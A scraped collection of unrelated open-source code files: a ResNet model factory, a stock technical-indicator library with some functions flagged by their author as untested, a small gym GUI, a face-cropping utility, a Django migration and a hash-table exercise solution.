old_conv.weight.is_cuda:\n new_conv.cuda()\n self.input_stem[0] = new_conv\n\n def load_state_dict(self, state_dict, *args, **kwargs):\n # load the parameters of old-version SE\n # where the `mlp` contains nn.Linear rather than nn.Conv2d\n pattern = 'se\\d\\.mlp\\.\\d\\.weight' # noqa\n for key, value in list(state_dict.items()):\n if re.fullmatch(pattern, key) and value.dim() == 2:\n state_dict[key] = value.unsqueeze(-1).unsqueeze(-1)\n super(ResNet, self).load_state_dict(state_dict, *args, **kwargs)\n\n\ndef __resnet__(model_name, layers, base_channels, bottleneck,\n shrink, num_groups,\n deep_stem, narrow_stem, pre_act,\n use_se, avg_down, neck_down):\n def f(pretrained=False, zero_gamma=False, num_classes=1000):\n model = ResNet(layers, base_channels, bottleneck,\n shrink, num_groups,\n deep_stem, narrow_stem, pre_act,\n use_se, avg_down, neck_down, zero_gamma,\n num_classes)\n if pretrained:\n import pdb; pdb.set_trace()\n return model\n\n f.__doc__ = \\\n \"\"\"Constructs a {} model.\n\n Structure Arguments:\n layers: {}\n base_channels: {}\n bottleneck: {}\n shrink: {}\n num_groups: {}\n deep_stem: {}\n narrow_stem: {}\n pre_act: {}\n use_se: {}\n avg_down: {}\n neck_down: {}\n\n Args:\n pretrained (bool): If True, returns a model pre-trained on ImageNet\n zero_gamma (bool): If True, zero-initialize the weight of last bn in each residual block\n num_classes (int): Number of output classes\n \"\"\".format(model_name, layers, base_channels, bottleneck,\n shrink, num_groups,\n deep_stem, narrow_stem, pre_act,\n use_se, avg_down, neck_down)\n\n return f\n\n\nse_configs = [\n ['', {'use_se': False}],\n ['se_', {'use_se': True}],\n]\nlayer_configs = [\n ['18', {'layers': [2, 2, 2, 2], 'bottleneck': False}],\n ['34', {'layers': [3, 4, 6, 3], 'bottleneck': False}],\n ['50', {'layers': [3, 4, 6, 3], 'bottleneck': True}],\n ['101', {'layers': [3, 4, 23, 3], 'bottleneck': True}],\n ['152', {'layers': [3, 8, 36, 3], 'bottleneck': True}],\n]\nversion_configs = [\n ['v1', {'pre_act': False}],\n ['v2', {'pre_act': True}],\n]\ntweak_configs = [\n ['a', {'deep_stem': False, 'narrow_stem': False, 'avg_down': False, 'neck_down': False}],\n ['b', {'deep_stem': False, 'narrow_stem': False, 'avg_down': False, 'neck_down': True}],\n ['c', {'deep_stem': True, 'narrow_stem': True, 'avg_down': False, 'neck_down': True}],\n ['d', {'deep_stem': True, 'narrow_stem': True, 'avg_down': True, 'neck_down': True}],\n]\nwidth_configs = [\n ['_4by1', {'base_channels': 256}],\n ['_2by1', {'base_channels': 128}],\n ['', {'base_channels': 64}],\n ['_1by2', {'base_channels': 32}],\n ['_3by8', {'base_channels': 24}],\n ['_1by4', {'base_channels': 16}],\n ['_1by8', {'base_channels': 8}],\n ['_1by16', {'base_channels': 4}],\n]\ngroup_configs = [\n ['', {'num_groups': 1}],\n ['_g2', {'num_groups': 2}],\n ['_g4', {'num_groups': 4}],\n ['_g8', {'num_groups': 8}],\n ['_g16', {'num_groups': 16}],\n ['_g32', {'num_groups': 32}],\n ['_g64', {'num_groups': 64}],\n]\nshrink_configs_1 = [\n ['', {'shrink': 1}],\n]\nshrink_configs_2 = [\n ['_s1', {'shrink': 1}],\n ['_s2', {'shrink': 2}],\n ['', {'shrink': 4}],\n ['_s8', {'shrink': 8}],\n]\nshrink_configs_dict = {\n '18': shrink_configs_1,\n '34': shrink_configs_1,\n '50': shrink_configs_2,\n '101': shrink_configs_2,\n '152': shrink_configs_2,\n}\nlocal = locals()\nfor SE, se in se_configs:\n for LAY, lay in layer_configs:\n for VER, ver in version_configs:\n for TW, tw in tweak_configs:\n for WID, wid in width_configs:\n for GRP, grp in group_configs:\n for SHR, shr in shrink_configs_dict[LAY]:\n if LAY in ['18', '34']:\n min_neck_channels = round(wid['base_channels'] / shr['shrink'])\n else:\n min_neck_channels = round(wid['base_channels'] * 4 / shr['shrink'])\n if min_neck_channels % grp['num_groups'] != 0:\n continue\n model_name = '{SE}resnet{LAY}_{VER}{TW}{WID}{SHR}{GRP}'.format(\n SE=SE, LAY=LAY, VER=VER, TW=TW, WID=WID, SHR=SHR, GRP=GRP,\n )\n assert model_name not in local\n local[model_name] = __resnet__(\n 'gluon.' + model_name,\n **lay, **wid, **ver, **tw, **se, **shr, **grp,\n )\n __all__.append(model_name)\n\n\nstd_nick_names = []\nstd_nick_names.extend([\n ('resnet18_v1b', 'resnet18'),\n ('resnet34_v1b', 'resnet34'),\n ('resnet50_v1b', 'resnet50'),\n ('resnet101_v1b', 'resnet101'),\n ('resnet152_v1b', 'resnet152'),\n])\nfor lay in ('50', '101', '152'):\n std_nick_names.extend([\n ('resnet{}_v1b'.format(lay), 'resnext{}_1x64d'.format(lay)),\n ('resnet{}_v1b_g2'.format(lay), 'resnext{}_2x32d'.format(lay)),\n ('resnet{}_v1b_g4'.format(lay), 'resnext{}_4x16d'.format(lay)),\n ('resnet{}_v1b_g8'.format(lay), 'resnext{}_8x8d'.format(lay)),\n ('resnet{}_v1b_g16'.format(lay), 'resnext{}_16x4d'.format(lay)),\n ('resnet{}_v1b_g32'.format(lay), 'resnext{}_32x2d'.format(lay)),\n ('resnet{}_v1b_g64'.format(lay), 'resnext{}_64x1d'.format(lay)),\n\n ('resnet{}_v1b_s2'.format(lay), 'resnext{}_1x128d'.format(lay)),\n ('resnet{}_v1b_s2_g2'.format(lay), 'resnext{}_2x64d'.format(lay)),\n ('resnet{}_v1b_s2_g4'.format(lay), 'resnext{}_4x32d'.format(lay)),\n ('resnet{}_v1b_s2_g8'.format(lay), 'resnext{}_8x16d'.format(lay)),\n ('resnet{}_v1b_s2_g16'.format(lay), 'resnext{}_16x8d'.format(lay)),\n ('resnet{}_v1b_s2_g32'.format(lay), 'resnext{}_32x4d'.format(lay)),\n ('resnet{}_v1b_s2_g64'.format(lay), 'resnext{}_64x2d'.format(lay)),\n\n ('resnet{}_v1b_s1'.format(lay), 'resnext{}_1x256d'.format(lay)),\n ('resnet{}_v1b_s1_g2'.format(lay), 'resnext{}_2x128d'.format(lay)),\n ('resnet{}_v1b_s1_g4'.format(lay), 'resnext{}_4x64d'.format(lay)),\n ('resnet{}_v1b_s1_g8'.format(lay), 'resnext{}_8x32d'.format(lay)),\n ('resnet{}_v1b_s1_g16'.format(lay), 'resnext{}_16x16d'.format(lay)),\n ('resnet{}_v1b_s1_g32'.format(lay), 'resnext{}_32x8d'.format(lay)),\n ('resnet{}_v1b_s1_g64'.format(lay), 'resnext{}_64x4d'.format(lay)),\n ])\nstd_nick_names.extend([\n ('resnet18_v1b_2by1', 'wide_resnet18_x2'),\n ('resnet18_v1b_4by1', 'wide_resnet18_x4'),\n ('resnet34_v1b_2by1', 'wide_resnet34_x2'),\n ('resnet34_v1b_4by1', 'wide_resnet34_x4'),\n ('resnet50_v1b_s2', 'wide_resnet50_x2'),\n ('resnet50_v1b_s1', 'wide_resnet50_x4'),\n ('resnet101_v1b_s2', 'wide_resnet101_x2'),\n ('resnet101_v1b_s1', 'wide_resnet101_x4'),\n ('resnet152_v1b_s2', 'wide_resnet152_x2'),\n ('resnet152_v1b_s1', 'wide_resnet152_x4'),\n])\nfor std_name, nick_name in std_nick_names:\n assert nick_name not in local\n local[nick_name] = local[std_name]\n __all__.append(nick_name)\n","repo_name":"bigvideoresearch/SCC","sub_path":"runner_master/runner/models/gluon/resnet.py","file_name":"resnet.py","file_ext":"py","file_size_in_byte":21039,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"94"}
+{"seq_id":"4390303106","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 23 11:06:53 2018\n\n@author: Eric Guo\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport math\n\n# True Range (TR) & Average True Range (ATR)\n# True Range (TR) is defined as the greatest of the following\n# Method 1: Current High less the current Low\n# Method 2: Current High less the previous Close (absolute value)\n# Method 3: Current Low less the previous Close (absolute value)\n# Current ATR = [(Prior ATR x 13) + Current TR] / 14\n# Or: moving average of the 14 TRs\n# untested, may be wrong\ndef calculate_atr(df_close, df_high, df_low, look_back=14):\n atr = lambda close, high, low: max((high[-1] - low[-1]), (high[-1] - close[-2]), (low[-1] - close[-2])).mean()\n # may be wrong\n df_atr = (df_close, df_high, df_low).rolling(window=look_back).apply(atr)\n return df_atr\n\n# Standard Deviation (STD)\ndef calculate_std(df_price, look_back):\n df_std = df_price.rolling(window=look_back).std()\n df_std = df_std[(look_back-1):]\n return df_std\n\n# Daily Returns (%)\ndef calculate_daily_returns(df_price):\n df_dr = (df_price / df_price.shift(1)) - 1\n df_dr.ix[0, :] = 0\n return df_dr\n\n# Sharpe Ratio\n# SR = (Mean portfolio return − Risk-free rate)/Standard deviation of portfolio return\n# SR_annual = sqrt(252) * SR_daily\n# SR_annual = sqrt(52) * SR_weekly\n# SR_annual = sqrt(12) * SR_monthly\ndef calculate_sharpe_ratio(df_daily_returns, risk_free_rate=0):\n years = df_daily_returns.index.year.unique()\n df_sr = pd.DataFrame(columns=df_daily_returns.columns.values)\n \n for year in years:\n str_year = str(year)\n series_sr = (df_daily_returns.loc[str_year].mean() - risk_free_rate) / df_daily_returns.loc[str_year].std()\n df_sr = df_sr.append(series_sr, ignore_index=True)\n df_sr.insert(0, column='year', value=years)\n df_sr.set_index('year', inplace=True)\n # convert daily to annually \n df_sr = df_sr * math.sqrt(252)\n return df_sr\n \n# Mean Absolute Deviation (MAD)\n# x[] = xi - x.mean()\n# MAD = x[].mean()\ndef calculate_mad(df_price, look_back):\n mad = lambda x: np.fabs(x - x.mean()).mean()\n df_mad = df_price.rolling(window=look_back).apply(mad)\n df_mad = df_mad[(look_back-1):]\n return df_mad\n\n# Simple Moving Average (SMA)\ndef calculate_sma(df_price, look_back):\n df_sma = df_price.rolling(window=look_back, min_periods=1).mean()\n df_sma = df_sma[(look_back-1):]\n return df_sma\n\n# Exponential Moving Average (EMA)\n# Initial SMA/EMA: 10-period sum / 10\n# Multiplier: (2 / (Time periods + 1) )\n# EMA: {Close - EMA(previous day)} x multiplier + EMA(previous day)\ndef calculate_ema(df_price, look_back=10):\n # df_sma = calculate_sma(df_closing_price, look_back)\n # multiplier = 2 / (look_back + 1)\n return df_price.ewm(span=look_back).mean()\n\n\n \n# Leading Indicators\n# Designed to lead price movements\n# Most represent a form of price momentum over a fixed lookback period\n# which is the number of periods used to calculate the indicator\n\n# Relative Strength Index (RSI)\n# Momentum oscillator that measures the speed and change of price movements.\n# Range: 0 - 100\n# RSI = 100 - 100 / (1 + RS)\n# RS = Average Gain / Average Loss\n# First Average Gain = Sum of Gains over the past 14 periods / 14\n# First Average Loss = Sum of Losses over the past 14 periods / 14\n# The second, and subsequent, calculations are based on the prior averages and the current gain loss\n# Average Gain = [(previous Average Gain) x 13 + current Gain] / 14\n# Average Loss = [(previous Average Loss) x 13 + current Loss] / 14\n# The default look-back period for RSI is 14\n# RSI is considered overbought when above 70 and oversold when below 30\ndef calculate_rsi(df, look_back=14):\n df_gain = df.copy()\n df_gain.where(df_gain > 0, 0, inplace=True)\n df_loss = df.copy()\n df_loss.where(df_loss < 0, 0, inplace=True)\n df_loss = df_loss.abs()\n \n # df_avg_gain[0, :] = df_gain.ix[:14, :].mean()\n df_avg_gain = df_gain.rolling(window=look_back, min_periods=1).mean()\n df_avg_gain = df_avg_gain[(look_back-1):]\n df_avg_loss = df_loss.rolling(window=look_back, min_periods=1).mean()\n df_avg_loss = df_avg_loss[(look_back-1):]\n \n df_rs = df_avg_gain / df_avg_loss\n # print \"rs is: \", df_rs\n df_rsi = 100 - 100 / (1 + df_rs)\n # print \"rsi: \", df_rsi\n return df_rsi\n \n# Commodity Channel Index (CCI)\n# CCI = (Typical Price - 20-period SMA of TP) / (.015 x Mean Deviation)\n# Typical Price (TP) = (High + Low + Close) / 3\n# Constant = .015\n# As a coincident indicator\n# surges above +100 reflect strong price action that can signal the start of an uptrend\n# Plunges below -100 reflect weak price action that can signal the start of a downtrend.\n# As a leading indicator\n# chartists can look for overbought or oversold conditions that may foreshadow a mean reversion. \ndef calculate_cci(df_typical_price, look_back, constant=0.015):\n df_sma = calculate_sma(df_typical_price, look_back)\n df_mad = calculate_mad(df_typical_price, look_back)\n df_cci = (df_typical_price[(look_back-1):] - df_sma) / (constant * df_mad)\n return df_cci\n\n# Stochastic Oscillator\n\n# Williams %R\n\n# Lagging Indicators\n# Follow the price action and are commonly referred to as trend-following indicators. \n# Trend-following indicators work best when markets or securities develop strong trends.\n\n# Moving Averages (exponential, simple, weighted, variable)\n\n# Moving Average Convergence / Divergence (MACD)\n# MACD line: (12-day EMA - 26-day EMA)\n# Signal line: 9-day EMA of MACD line\n# MACD Histogram: MACD line - Signal line\n\n# Oscillator\n# An oscillator is an indicator that fluctuates above and below a centerline\n# or between set levels as its value changes over time.\n\n# Centered Oscillators - MACD, ROC \n# Banded Oscillators - RSI, Stochastic Oscillator, CCI\n\n# Rate of Change (ROC)\n# ROC = [(Close - Close n periods ago) / (Close n periods ago)] * 100\ndef calculate_roc(df_closing_price, look_back):\n roc = lambda x: (x[-1] - x[0]) / x[0] * 100\n df_roc = df_closing_price.rolling(window=look_back).apply(roc)\n df_roc = df_roc[(look_back-1):]\n return df_roc\n\n\n\n# *** Technical Overlays ***\n\n# http://stockcharts.com/school/doku.php?id=chart_school:technical_indicators\n \n# Bollinger Bands\n# Middle Band = 20-day simple moving average (SMA)\n# Upper Band = 20-day SMA + (20-day standard deviation of price x 2)\n# Lower Band = 20-day SMA - (20-day standard deviation of price x 2)\n# By default use 20-day moving average and multiplier of 2\n# Multiplier is set to 2.1 for 50-day SMA, 1.9 for 10-day SMA\n# According to Bollinger, the bands should contain 88-89% of price action, which makes a move outside the bands significant\ndef calculate_bollinger_bands(df_closing_price, look_back=20, std_multiplier=2):\n df_m = calculate_sma(df_closing_price, look_back)\n df_std = calculate_std(df_closing_price, look_back)\n df_u = df_m + (df_std * std_multiplier)\n df_l = df_m - (df_std * std_multiplier)\n return df_m, df_u, df_l\n\n# Chandelier Exit\n# Chandelier Exit (long) = 22-day High - ATR(22) x 3 \n# Chandelier Exit (short) = 22-day Low + ATR(22) x 3\n# By default uses 22-periods (22 trading days per month) and a multiplier of 3\n# not tested\ndef calculate_ce(df_close, df_high, df_low, look_back=22, multiplier=3):\n df_ce_long = df_high.rolling(window=look_back).max() - (calculate_atr(df_close, df_high, df_low, look_back) * multiplier)\n df_ce_short = df_low.rolling(window=look_back).min() + (calculate_atr(df_close, df_high, df_low, look_back) * multiplier)\n return df_ce_long, df_ce_short\n\n# Ichimoku Clouds\n# Tenkan-sen (Conversion Line): (9-period high + 9-period low)/2))\n# Kijun-sen (Base Line): (26-period high + 26-period low)/2))\n# Senkou Span A (Leading Span A): (Conversion Line + Base Line)/2))\n# Senkou Span B (Leading Span B): (52-period high + 52-period low)/2))\n# Chikou Span (Lagging Span): Close plotted 26 days in the past\n# The Cloud (Kumo) is the most prominent feature of the Ichimoku Cloud plots\n# The Leading Span A (green) and Leading Span B (red) form the Cloud\n# the trend is up when prices are above the Cloud\n# the trend is down when prices are below the Cloud\n# and flat when prices are in the Cloud\n# the uptrend is strengthened when the Leading Span A (green cloud line) is rising and above the Leading Span B (red cloud line). This situation produces a green Cloud\n# a downtrend is reinforced when the Leading Span A (green cloud line) is falling and below the Leading Span B (red cloud line). This situation produces a red Cloud\n# untested\ndef calculate_ichimoku(df_close, df_high, df_low, look_back_tenkan=9, look_back_kijun=26, look_back_senkou=52, look_back_chikou=26):\n df_tenkan = (df_high.rolling(window=look_back_tenkan).max() + df_low.rolling(window=look_back_tenkan).min()) / 2\n df_kijun = (df_high.rolling(window=look_back_kijun).max() + df_low.rolling(window=look_back_kijun).min()) / 2\n df_senkou_a = (df_tenkan + df_kijun) / 2\n df_senkou_b = (df_high.rolling(window=look_back_senkou).max() + df_low.rolling(window=look_back_senkou).min()) / 2\n df_chikou = df_close.shift(look_back_chikou)\n return df_tenkan, df_kijun, df_senkou_a, df_senkou_b, df_chikou\n\n# Kaufman's Adaptive Moving Average (KAMA)\n# Efficiency Ratio (ER) = Change / Volatility\n# Change = ABS(Close - Close (10 periods ago))\n# Volatility = Sum10(ABS(Close - Prior Close))\n# Volatility is the sum of the absolute value of the last ten price changes (Close - Prior Close)\n# Smoothing Constant (SC) \n# SC = [ER x (fastest SC - slowest SC) + slowest SC]2\n# SC = [ER x (2/(2+1) - 2/(30+1)) + 2/(30+1)]2\n# Current KAMA = Prior KAMA + SC x (Price - Prior KAMA)\n# untested, messy\ndef calculate_kama(df_close, look_back_change=10, look_back_volatility=10, fast_sc=2, slow_sc=30):\n # Efficiency Ratio(ER)\n change = lambda x: np.fabs(x[-1] - x[0])\n df_change = df_close.rolling(window=look_back_change).apply(change)\n df_daily_volatility = np.fabs(df_close - df_close.shift(1))\n df_volatility = df_daily_volatility.rolling(window=look_back_volatility).sum()\n df_er = df_change / df_volatility\n # Smoothing Constant(SC)\n df_sc = (df_er * (2 / (fast_sc + 1) - 2 / (slow_sc + 1)) + 2 / (slow_sc + 1)) ** 2\n ## KAMA\n df_kama = pd.DataFrame(columns=df_sc.columns.values)\n series_sma = df_close[0:10].mean()\n df_kama.append(series_sma, ignore_index=True)\n for index, row in df_sc[10:].iterrows():\n df_temp = df_kama.tail(1) + df_sc.iloc[[index]] * (df_close.iloc[[index]] - df_kama.tail(1))\n df_kama.append(df_temp, ignore_index=True)\n df_sc_index = df_sc[9:].index\n df_kama = pd.DataFrame(data=df_kama, index=df_sc_index)\n return df_kama\n\n# Keltner Channels\n# Middle Line: 20-day exponential moving average \n# Upper Channel Line: 20-day EMA + (2 x ATR(10))\n# Lower Channel Line: 20-day EMA - (2 x ATR(10))\n# untested\ndef calculate_kc(df_close, df_high, df_low, look_back_ema=20, look_back_atr=10, multiplier=2):\n df_m = calculate_ema(df_close, look_back=look_back_ema)\n df_atr = calculate_atr(df_close, df_high, df_low, look_back_atr)\n df_u = df_m + (multiplier * df_atr)\n df_l = df_m - (multiplier * df_atr)\n return df_m, df_u, df_l\n\n# Moving Average Envelopes\n# Upper Envelope: 20-day SMA + (20-day SMA x .025)\n# Lower Envelope: 20-day SMA - (20-day SMA x .025)\n# untested\ndef calculate_mae(df_price, look_back=20, multiplier=0.025):\n df_m = calculate_sma(df_price, look_back)\n df_u = df_m * (1 + multiplier)\n df_l = df_m * (1 - multiplier)\n return df_m, df_u, df_l\n\n ","repo_name":"EGAILab/DDTrading","sub_path":"TechnicalIndicators.py","file_name":"TechnicalIndicators.py","file_ext":"py","file_size_in_byte":11624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"}
+{"seq_id":"38099825651","text":"import PySimpleGUI as sg\nfrom register import registerwindow\nfrom search import searchwindow\nfrom fitness import fitnesswindow\nfrom help import helpwindow\n\nsg.theme(\"DarkTeal2\")\n\nheading = [\n [sg.Text(\"City Gym App\",\n font=\"16\", justification='c', expand_x=True, pad=(12, 12))]\n]\n\ndescription = [\n [sg.Text('City Gym App allows you to efficiently manage users',\n font='14', justification='c', expand_x=True, pad=(16, 16))]\n]\n\nlayout = [[heading],\n [description],\n [sg.Stretch(), sg.Button('Register', pad=(16, 16)), sg.Button('Search', pad=(16, 16)),\n sg.Button('Fitness', pad=(16, 16)), sg.Button(\n 'Help', pad=(16, 16)), sg.Button('Quit', pad=(16, 16)),\n sg.Stretch()]\n ]\n\nwindow = sg.Window(\"City Gym\", layout, size=(600, 250))\n\nwhile True:\n event, values = window.read()\n\n if event == sg.WIN_CLOSED or event == 'Quit':\n break\n elif event == 'Register':\n registerwindow()\n elif event == 'Search':\n searchwindow()\n elif event == 'Fitness':\n fitnesswindow()\n elif event == 'Help':\n helpwindow()\n else:\n pass\n","repo_name":"mburuanthony/fitness","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"}
+{"seq_id":"41457682656","text":"#author: Tomo Lapautre\n\nimport cv2\nimport numpy as np\n\nimport pathlib\nfrom pathlib import Path\nimport glob\nimport os\nfrom PIL import Image, ImageOps\n\nfrom main.constants import (\n PNGS,\n CV2_FILETYPES,\n DNN_THRESHOLD,\n FAILED_IMAGE_FOLDER) \n\n\n\nclass FaceCrop():\n \n def __init__(self, height, width, height_asy, width_asy, tag='A', pyqt_ui=None):\n \n self.width = width #The width of the cropped image, expressed as a percentage of the initial image width. (Int between 0 and 100)\n self.width_asy = width_asy #The horizontal assymmetry of the cropping area relative to the position of the face. \n #Positive values will shift the image to the left of the face and negative values to the right (Integers)\n self.height = height #The height of the cropped image, expressed as a percentage of the initial image height. (Int between 0 and 100)\n self.height_asy = height_asy #The vertical assymmetry of the cropped area relative to the position of the face. \n #Positive values will shift the image down from the face and negative values will shift the image up (Integers).\n self.tag = tag #The program will save the cropped image with its original file name + the file tag. Ex: IMG001 is saved as IMG001_A for a file tag of 'A'. Optional.\n self.failure_folder = FAILED_IMAGE_FOLDER #folder where images where faces couldn't be detected will be stored\n self.threshold = DNN_THRESHOLD #threshold of confidence to categorise as a face\n self.progress_count = 0 #to keep track of progress bar\n self.pyqt_ui = pyqt_ui #this variable is to integrate this class to your pyqt GUI so that, for example you can generate a progress bar\n\n #files of the trained neural network given by cv2\n self.modelFile = \"main/res10_300x300_ssd_iter_140000.caffemodel\"\n self.configFile = \"main/deploy.prototxt.txt\"\n self.net = cv2.dnn.readNetFromCaffe(self.configFile, self.modelFile)\n\n\n #finds the face and saves the cropped face in your output directory\n def crop_save(self, input_directory, output_path, bool_folder=False, bool_face_count=False, preview=False):\n #if 'bool_face_count' is set to True, program will only save one face per image (the one with the highest confidence)\n #if 'bool_folder' is set to True, program will save the new image in its seperate folder. This can be useful if you have multiple faces per image.\n #if 'preview' is set to True, only crops the first face it can find and returns the image.\n\n folder_name = pathlib.PurePath(input_directory).name\n files = glob.glob('{}/*'.format(input_directory)) #finds all the files in your directory\n\n if self.tag:\n self.tag = \"_\" + self.tag \n \n #loops through all the files in the directory\n for i, file in enumerate(files):\n \n #updates the pyqt progress bar\n if not preview and self.pyqt_ui is not None:\n self.progress_count += 1\n self.pyqt_ui.progress.setValue(self.progress_count)\n \n #breaks program if user clicks on cancel button of progress bar\n if self.pyqt_ui.progress.wasCanceled():\n break\n \n \n file_path = Path(file)\n file_name = file_path.stem\n ext = file_path.suffix\n\n #checks if image is readable by cv2\n if ext.lower() not in CV2_FILETYPES:\n continue\n \n image = cv2.imdecode(np.fromfile(file, dtype=np.uint8), cv2.IMREAD_COLOR)\n \n try:\n img_height, img_width = image.shape[:2]\n except AttributeError:\n print('{}: ImageReadError'.format(file_name))\n continue\n \n blob = cv2.dnn.blobFromImage(cv2.resize(image, (300, 300)), 1.0, (300, 300), (104.0, 117.0, 123.0)) #resize image\n self.net.setInput(blob)\n faces = self.net.forward()\n \n #reload image using PIL as cv2 isn't adapted in this scenario to read PNGs properly. This increases the length of operation but is the only solution I could find.\n #(cv2 can read pngs by specifying cv2.IMREAD_UNCHANGED but this is a double edged sword as you lose the EXIF data of the image as well)\n temp_file = np.asarray(ImageOps.exif_transpose(Image.open(file)))\n \n width_px = int((abs(self.width)*img_width)/100) #width of the output picture in pixel\n height_px = int((abs(self.height)*img_height)/100) #height of the output picture in pixel\n \n k = 0 #'k' keeps track of how faces pass the threshold test in an image\n \n if bool_face_count: #only saves the face with the highest confidence, which is the first one in the sorted array\n face_range = range(1)\n else:\n face_range = range(faces.shape[2])\n \n #loop through all the potential faces found the neural network\n for i in face_range:\n confidence = faces[0, 0, i, 2]\n if confidence > self.threshold: #checks if confidence is high enough\n k+=1\n \n box = faces[0, 0, i, 3:7] * np.array([img_width, img_height, img_width, img_height]) #transform face from proportion to pixels\n face = box.astype(\"int\")\n x0, y0, x1, y1 = face #coordinates of the face in pixel \n h = y1 - y0 #height of face\n w = x1 - x0 #width of face\n \n south = min(int(y0 + 0.5*h + ((50+self.height_asy)/100)*height_px), img_height) #southern border of our new cropped image\n\n #makes sure that north and south are not outside the original image\n if south - height_px < 0 and ext.lower() not in PNGS: \n south = height_px\n north = 0\n else:\n north = max(south - height_px, 0)\n \n west = max(int(x0 + 0.5*w - ((50+self.width_asy)/100)*width_px), 0) #western border of our new cropped image\n\n #makes sure that east and west are not outside the original image\n if west + width_px > img_width: \n west = img_width - width_px\n east = img_width\n else:\n east = min(west + width_px, img_width)\n \n #crops the new image from the original one\n face = temp_file[north : south, west : east]\n \n\n #if image is a PNG, we can add extend the height above the top of the head to make sure every cropped image has the same space above their head. \n #This is useful if you have images of tall individuals with very little space between the top of his/her head\n if ext.lower() in PNGS:\n extra_height = height_px - min(int(y0 + 0.5*h + ((50+self.height_asy)/100)*height_px), img_height)\n if extra_height > 0:\n extra_layer = np.full((extra_height, face.shape[1], 4), 255, dtype='uint8')\n extra_layer[:, :, 3] = 0 #value of 0 is a white background\n face = np.concatenate((extra_layer, face), axis=0)\n \n cropped_face = Image.fromarray(face)\n \n #only looks for the first face it can find if in preview mode\n if preview:\n return cropped_face\n break\n \n \n file_name_folder = file_name.rstrip()\n\n #saves the cropped image\n if bool_folder: \n if not os.path.exists('{0}/{1}/{2}'.format(output_path, folder_name, str(file_name_folder))): #checks if directory already exists\n os.makedirs('{0}/{1}/{2}'.format(output_path, folder_name, str(file_name_folder)))\n if k==1:\n cropped_face.save('{0}/{1}/{2}/{2}{3}{4}'.format(output_path, folder_name, str(file_name_folder), self.tag, ext))\n else:\n cropped_face.save('{0}/{1}/{2}/{2}{3}_{4}{5}'.format(output_path, folder_name, str(file_name_folder), self.tag, k, ext)) \n \n else:\n if not os.path.exists('{0}/{1}'.format(output_path, folder_name)): #checks if directory already exists\n os.mkdir('{0}/{1}'.format(output_path, folder_name))\n if k==1:\n cropped_face.save('{0}/{1}/{2}{3}{4}'.format(output_path, folder_name, str(file_name), self.tag, ext))\n else:\n cropped_face.save('{0}/{1}/{2}{3}_{4}{5}'.format(output_path, folder_name, str(file_name), self.tag, k, ext))\n \n #checks if program couldn't find any face for an image. If so, will save the original image in a seperate folder\n if k == 0:\n if preview:\n pass\n \n else:\n print('{}: Failed to detect face'.format(file_name))\n if not os.path.exists('{0}/{1}'.format(output_path, self.failure_folder)):\n os.mkdir('{0}/{1}'.format(output_path, self.failure_folder))\n Image.fromarray(temp_file).save('{0}/{1}/{2}{3}'.format(output_path, self.failure_folder, str(file_name), ext))\n \n continue \n \n\n","repo_name":"TomoLPT/face-detection-cropping","sub_path":"main/facecrop.py","file_name":"facecrop.py","file_ext":"py","file_size_in_byte":10026,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"94"}
+{"seq_id":"14233416523","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.core.validators\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Entry',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('username', models.CharField(max_length=100)),\n ('spammed_number', models.CharField(max_length=256, validators=[django.core.validators.RegexValidator(b'^[0-9]*$', b'Please Enter a Valid Phone Number')])),\n ],\n ),\n ]\n","repo_name":"mohamed-alattal/androidApi","sub_path":"server/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"}
+{"seq_id":"18761141136","text":"#https://programmers.co.kr/learn/courses/30/lessons/42579\n\nimport collections\n'''\n속한 노래가 많이 재생된 장르를 먼저 수록합니다.\n장르 내에서 많이 재생된 노래를 먼저 수록합니다.\n장르 내에서 재생 횟수가 같은 노래 중에서는 고유 번호가 낮은 노래를 먼저 수록합니다.\n'''\ndef solution(genres, plays):\n answer = []\n\n genres_idx = collections.defaultdict(list)\n genres_play = collections.defaultdict(int)\n\n for i,g in enumerate(genres):\n genres_idx[g].append((i,plays[i]))\n\n for g,play in zip(genres,plays):\n genres_play[g] = genres_play[g] + play\n\n play_sort = []\n for s in list(set(genres)):\n play_sort.append((s,genres_play[s]))\n play_sort = sorted(play_sort,reverse=True,key=(lambda x:x[1]))\n\n for g,p_n in play_sort:\n genres_idx[g] = sorted(genres_idx[g],reverse=True,key=(lambda x:x[1]))\n temp = list(map(lambda x:x[0],genres_idx[g][0:2]))\n for i in temp:\n answer.append(i)\n\n return answer\n\n\n'''\n변수명 날잡고 바꾸기\n\n'''","repo_name":"ddobokki/coding-test-practice","sub_path":"프로그래머스/해쉬/42579.py","file_name":"42579.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"}
